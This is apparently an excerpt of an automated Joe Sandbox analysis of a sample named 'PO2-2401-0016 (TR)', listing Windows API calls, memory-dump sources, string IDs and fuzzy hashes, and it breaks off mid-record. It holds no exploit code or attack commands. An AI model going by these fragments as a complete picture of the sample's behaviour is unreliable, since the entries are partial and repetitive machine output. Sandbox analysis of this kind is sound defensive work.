                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001AD882
                                • ReleaseDC.USER32(?), ref: 001AD8A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 5fb5b6bfd601eb650301cc96854fc33d617fcd7509aa6ed00e3b556a6c8c8354
                                • Instruction ID: 7683996b03be14eb6ceeeea1f4397ea6a63391dbab261563ee672c46cb96b620
                                • Opcode Fuzzy Hash: 5fb5b6bfd601eb650301cc96854fc33d617fcd7509aa6ed00e3b556a6c8c8354
                                • Instruction Fuzzy Hash: A0E01AB8800204DFCF419FE4DC4866EBBB1FB48311F118409F816EB750C7384992AF80
                                APIs
                                • GetDesktopWindow.USER32 ref: 001AD86C
                                • GetDC.USER32(00000000), ref: 001AD876
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001AD882
                                • ReleaseDC.USER32(?), ref: 001AD8A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: cdb952920b08dc96e74f81485cc875cd62b1e671e0f2a6c62b62080191c4e14d
                                • Instruction ID: f3099c2a4f126f4b9dd719f364912cdb8a383943c695fdb07094f23851925816
                                • Opcode Fuzzy Hash: cdb952920b08dc96e74f81485cc875cd62b1e671e0f2a6c62b62080191c4e14d
                                • Instruction Fuzzy Hash: 93E012B4C00200EFCF40AFE4DC8866EBBB1BB48311B108409F81AEB750CB385982AF80
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001C4ED4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Connection_wcslen
                                • String ID: *$LPT
                                • API String ID: 1725874428-3443410124
                                • Opcode ID: 11f4dbcfe8c5fa8e0a0f120c6eff3c34125e701fbfb71e79d7f7758739ad7039
                                • Instruction ID: bdccafb17d88d01912f4a739ad55d167985cfabd5715cb449c37e88f0b010c42
                                • Opcode Fuzzy Hash: 11f4dbcfe8c5fa8e0a0f120c6eff3c34125e701fbfb71e79d7f7758739ad7039
                                • Instruction Fuzzy Hash: C0917B74A042049FDB14DF58C494FAABBF1AF64304F19809DE84A9F3A2D735EE85CB90
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 0017E30D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: dfb2ac2cefe9cf1b69acf60ad67a50187fc8e5ce56ec6775b6a127ff2838a1e4
                                • Instruction ID: 2f0414df68c60a4ff7c075c712b45b4cffc0499d565ba97df42b11ec6c2f4479
                                • Opcode Fuzzy Hash: dfb2ac2cefe9cf1b69acf60ad67a50187fc8e5ce56ec6775b6a127ff2838a1e4
                                • Instruction Fuzzy Hash: D7513761A0C20296CB157724C94137A3BF4AB54740F34CED8E09A832E9EB35CED1DF46
                                APIs
                                • CharUpperBuffW.USER32(001A569E,00000000,?,001ECC08,?,00000000,00000000), ref: 001D78DD
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • CharUpperBuffW.USER32(001A569E,00000000,?,001ECC08,00000000,?,00000000,00000000), ref: 001D783B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BuffCharUpper$_wcslen
                                • String ID: <s!
                                • API String ID: 3544283678-2588671885
                                • Opcode ID: 8ce586bd6aba487b93901107cc334d07e3acc5fba7a30dd1a7161fb58bc42fcd
                                • Instruction ID: cfb542ee91d69d090ebdbc296683a686a1a9c4ac2d9e7329ceb66f450223305a
                                • Opcode Fuzzy Hash: 8ce586bd6aba487b93901107cc334d07e3acc5fba7a30dd1a7161fb58bc42fcd
                                • Instruction Fuzzy Hash: 31615E72914118EACF08EBA4DCA1DFDB374BF28305B844526E952AB191FF345A49DBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: #
                                • API String ID: 0-1885708031
                                • Opcode ID: e74337ba57b2852d3a62f5b869ce367c6aec06da2c64a6f183196e1a18177728
                                • Instruction ID: ed717b7508800db7161ba330e6c7f9fe28721e13770d2ac604829c4ad372bcc3
                                • Opcode Fuzzy Hash: e74337ba57b2852d3a62f5b869ce367c6aec06da2c64a6f183196e1a18177728
                                • Instruction Fuzzy Hash: C6516479900346DFDB19DFA8C891ABA7BE5EF26310F244119FC919B2C0DB349D56CBA0
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 0016F2A2
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0016F2BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: c534eb53d9e58a9fb66d7975ec36ffa046410414bcd45b34734075e68dc9858d
                                • Instruction ID: 33689b676728d23587d7eb94e7320452bb124306e9654ff776032c993270386d
                                • Opcode Fuzzy Hash: c534eb53d9e58a9fb66d7975ec36ffa046410414bcd45b34734075e68dc9858d
                                • Instruction Fuzzy Hash: D0515771408744DBD320AF14EC86BAFBBF8FB95301F81884DF5E945196EB708529CBA6
                                APIs
                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001D57E0
                                • _wcslen.LIBCMT ref: 001D57EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BuffCharUpper_wcslen
                                • String ID: CALLARGARRAY
                                • API String ID: 157775604-1150593374
                                • Opcode ID: 74a4b3b6ea795ad713e932749f48bc5bb1c8e20f1375ef55c3990886d0da4261
                                • Instruction ID: 40d88311a2f2c46150392b930240810290fb121da801e6ccbc20ad61cddd0d03
                                • Opcode Fuzzy Hash: 74a4b3b6ea795ad713e932749f48bc5bb1c8e20f1375ef55c3990886d0da4261
                                • Instruction Fuzzy Hash: 2041A031A00209DFCF14DFA9C8818AEBBB6FF69314F10416AE515AB391E7349D81CB90
                                APIs
                                • _wcslen.LIBCMT ref: 001CD130
                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001CD13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CrackInternet_wcslen
                                • String ID: |
                                • API String ID: 596671847-2343686810
                                • Opcode ID: f7dab63c0d5173c1dae1e644be3577186482e02f7b2f5395021a4b3b01ad5c8a
                                • Instruction ID: 6b5276cf5ae7eddfe0135b784975c3185359ca399ad6f7b1fcc47067c3dbb471
                                • Opcode Fuzzy Hash: f7dab63c0d5173c1dae1e644be3577186482e02f7b2f5395021a4b3b01ad5c8a
                                • Instruction Fuzzy Hash: 3531F871D01109ABCF15EFA4DC85AEE7BB9FF24300F040069F815AA161D731AA46CB90
                                APIs
                                • DestroyWindow.USER32(?,?,?,?), ref: 001E3621
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001E365C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$DestroyMove
                                • String ID: static
                                • API String ID: 2139405536-2160076837
                                • Opcode ID: 7901795866f451fdb803683cab74f91c1b4083d6d6fed057a44af844c2de7ec9
                                • Instruction ID: 5d4caa35a8b88a046845d9e54ab0ff147b3ea99aeab738c1e5c243c3dfea4321
                                • Opcode Fuzzy Hash: 7901795866f451fdb803683cab74f91c1b4083d6d6fed057a44af844c2de7ec9
                                • Instruction Fuzzy Hash: D5319E71100A44AEDB109F79DC85EFF73A9FF98760F009619F8A597280DB31AD92D760
                                APIs
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 001E461F
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001E4634
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: '
                                • API String ID: 3850602802-1997036262
                                • Opcode ID: 7bd75c92e11d5884fc8a1643aa7ee902166f9d95ee5799a480e48513329f153a
                                • Instruction ID: b6af29e73e9d958a400243e0d7b8fb02bc79c841d8dd976b76299186daa41de7
                                • Opcode Fuzzy Hash: 7bd75c92e11d5884fc8a1643aa7ee902166f9d95ee5799a480e48513329f153a
                                • Instruction Fuzzy Hash: A8311874A01759AFDB14CFAAC990BDEBBB5FF49300F14406AE905AB391D770A941CF90
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001E327C
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E3287
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 31a78315ff84cecf971bcfecaf67ee4313a099e4dff3df5d7238d289c3a7603f
                                • Instruction ID: 61100ad46a4a10fd3b6e7eb7e646975c4849a0d3ace3081b4f5205181d7079c5
                                • Opcode Fuzzy Hash: 31a78315ff84cecf971bcfecaf67ee4313a099e4dff3df5d7238d289c3a7603f
                                • Instruction Fuzzy Hash: E411D3712005497FEF259E95DC88EAF37AAEB943A4F100124FA6897290D7319D518760
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00184B91
                                • GetFileType.KERNEL32(00000000), ref: 00184BA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: 8
                                • API String ID: 3000768030-3897458245
                                • Opcode ID: abc5046b1c4f6352a0318e57fa8c8df706cc554ebc8b01e1343368288b181793
                                • Instruction ID: c7be741eb425de9c2806cef988daf1200dc75b5913c194cd5a1d96f0a09cbecc
                                • Opcode Fuzzy Hash: abc5046b1c4f6352a0318e57fa8c8df706cc554ebc8b01e1343368288b181793
                                • Instruction Fuzzy Hash: CD1184351087834BD734AE7D9CC8722BA98A796334B39071AD1B6865F1CB70DA86DB40
                                APIs
                                  • Part of subcall function 0015600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                  • Part of subcall function 0015600E: GetStockObject.GDI32(00000011), ref: 00156060
                                  • Part of subcall function 0015600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                • GetWindowRect.USER32(00000000,?), ref: 001E377A
                                • GetSysColor.USER32(00000012), ref: 001E3794
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                • String ID: static
                                • API String ID: 1983116058-2160076837
                                • Opcode ID: 8969c02eae11e5655311b9cdea95ac4e08c5541c350db938185578f0e17809ba
                                • Instruction ID: 6d1e68bef1bee937c8da48ced31df3082846c384055d3c08ef292048b5d043fe
                                • Opcode Fuzzy Hash: 8969c02eae11e5655311b9cdea95ac4e08c5541c350db938185578f0e17809ba
                                • Instruction Fuzzy Hash: A51159B2610649AFDF10DFA8CC49EEE7BB8EB08314F004514F965E3250D735E8519B90
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001CCD7D
                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001CCDA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$OpenOption
                                • String ID: <local>
                                • API String ID: 942729171-4266983199
                                • Opcode ID: d580bc24f97e4b7c508f3d516a5a667eca1366e0a2cbcabb5e4752a965975b2b
                                • Instruction ID: 5686faf0816ecec6b156ccb49130a1defc4513729ce8fb24d54205a304b25af1
                                • Opcode Fuzzy Hash: d580bc24f97e4b7c508f3d516a5a667eca1366e0a2cbcabb5e4752a965975b2b
                                • Instruction Fuzzy Hash: 7B11A77151563179D7284AA69C45FF7BE68EB227A4F014229F10E86080D770DC41D6F0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID: 8
                                • API String ID: 269201875-3897458245
                                • Opcode ID: 800d8f8d02625939d640f2c1550d6fd4e8d458960a9eb9c549cafc28f106a12c
                                • Instruction ID: e1ce9667158c49330012af6d387b864f4870bf1a28bbd6372a6ce941f0a8d58f
                                • Opcode Fuzzy Hash: 800d8f8d02625939d640f2c1550d6fd4e8d458960a9eb9c549cafc28f106a12c
                                • Instruction Fuzzy Hash: A811C871A60311A7DB30AB7CBC49B5633A8A75073CF145326F528CB1E1DB70D9478B80
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 001E34AB
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001E34BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: ddd86182a93c3f961c219c02b1f293b0538c88fddaac7c062cb46e43173933a9
                                • Instruction ID: 2e7d0b47a85f17fb0774e0d2f9c84b999c345e4860e683ef4b12bf70871a6acc
                                • Opcode Fuzzy Hash: ddd86182a93c3f961c219c02b1f293b0538c88fddaac7c062cb46e43173933a9
                                • Instruction Fuzzy Hash: C111BF71100588AFEB124E65DC88AEF376AEF15374F504324F970971D0C731DD929B50
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • CharUpperBuffW.USER32(?,?,?), ref: 001B6CB6
                                • _wcslen.LIBCMT ref: 001B6CC2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: STOP
                                • API String ID: 1256254125-2411985666
                                • Opcode ID: 91e21ff79c13f1c8dd8489e4829a7e8263a8e7334f4f2a885158b862f756da5d
                                • Instruction ID: 088d5af765dcec3b54c479d4915abd5065ead735fc314680db80a61a70d89301
                                • Opcode Fuzzy Hash: 91e21ff79c13f1c8dd8489e4829a7e8263a8e7334f4f2a885158b862f756da5d
                                • Instruction Fuzzy Hash: C9010032A00526CBCB20AFFDDC918FF7BB5EB75710B400928E8A29A190EB39D844C650
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001B3CCA
                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 001B1C46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 624084870-1403004172
                                • Opcode ID: 3bb148c78f0c87b09cfd7c153e5a91d5d2fdbe4c2b6aa68ebd58a94232f74a9b
                                • Instruction ID: 5ea96a0037408dc0ed90dbceca7d08da76d8461c0481d1c237844bb828086abf
                                • Opcode Fuzzy Hash: 3bb148c78f0c87b09cfd7c153e5a91d5d2fdbe4c2b6aa68ebd58a94232f74a9b
                                • Instruction Fuzzy Hash: 8B01A775681108F6CB08EB90D9629FF7BA89F66340F540019E8166B282EB209F1C96B2
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001B3CCA
                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 001B1CC8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
